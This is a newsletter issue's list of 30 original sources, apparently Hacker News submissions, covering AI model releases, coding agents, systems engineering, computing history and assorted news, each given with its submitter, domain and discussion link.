Every page of this issue began as someone else's work — these are the original sources, linked in full.

  1. Gemini 3.7 Flash by thisisauserid — blog.google·HN discussion ↗
  2. Spaghettifying DRAM by matt_d — github.com·HN discussion ↗
  3. Accelerating GPT-5.6 Sol Ultrafast by pr337h4m — cerebras.ai·HN discussion ↗
  4. DeepSeek Harness developer preview by bjin — deepseek.com·HN discussion ↗
  5. Launch HN: Bullet (YC S26) – A Faster Coding Agent by adi1 — codewithbullet.com·HN discussion ↗
  6. Understanding is the new bottleneck by sebg — geoffreylitt.com·HN discussion ↗
  7. Choose Boring Technology (2015) by tosh — mcfunley.com·HN discussion ↗
  8. Choosing an AI model: one prompt, 11 models, different results by toddmorey — netlify.com·HN discussion ↗
  9. How Compaction Works in Pi by tosh — earendil.com·HN discussion ↗
  10. How Organizations Use AI: Evidence from ChatGPT [pdf] by malshe — cdn.openai.com·HN discussion ↗
  11. AI At Home Part 1: A Box Of Scraps by timmmmmmay — jdagostino.github.io·HN discussion ↗
  12. Kubernetes on Oxide: How customer needs shaped our integrations by stevehipwell — oxide.computer·HN discussion ↗
  13. Flutter 3.47 by gumby271 — flutter.dev·HN discussion ↗
  14. Build Wide, Ship Narrow by ashumz — adapt.com·HN discussion ↗
  15. I built a 500k-domain search engine for makers in a weekend for $10 by dreamforever — alexmorleyfinch.github.io·HN discussion ↗
  16. Principia Mathematica is modern and insightful by matt_d — okmij.org·HN discussion ↗
  17. Ordinary Abundance by yen223 — ordinaryabundance.com·HN discussion ↗
  18. Happy 45th Birthday to the IBM PC and Model F/XT by tart-lemonade — sharktastica.co.uk·HN discussion ↗
  19. Come for ENIAC, Stay for UNIVAC and Skeduflo by cainxinth — uniqueatpenn.wordpress.com·HN discussion ↗
  20. Mushroom behind 'tiny people' hallucinations identified by wglb — phys.org·HN discussion ↗
  21. Antiqua–Fraktur dispute by buzzy_hacker — en.wikipedia.org·HN discussion ↗
  22. Gloomberb by rbanffy — gloom.sh·HN discussion ↗
  23. Mistral OCR 4.1 by spelk — docs.mistral.ai·HN discussion ↗
  24. Donkey.bas is 45 Years Old – 131 line of Glory by jkrauska — donkeybas.com·HN discussion ↗
  25. Deutsche Bank becomes first foreign yuan clearing bank in Europe by Markoff — tradersunion.com·HN discussion ↗
  26. Single log line is 49KB+ (ext4) / 110KB+ (btrfs) of systemd-journald disk writes by ValdikSS — github.com·HN discussion ↗
  27. NP-overrated by theanonymousone — gruhn.me·HN discussion ↗
  28. Codex in ChatGPT desktop app for Linux is now in preview by allanrbo — community.openai.com·HN discussion ↗
  29. uBlock Origin is giving up the fight to keep ads off Facebook by Markoff — digitalescapetools.com·HN discussion ↗
  30. Nine PBS sues Iron Mountain over blocked access to archival data by vinayakborkar — current.org·HN discussion ↗

Browse all issues in the archive →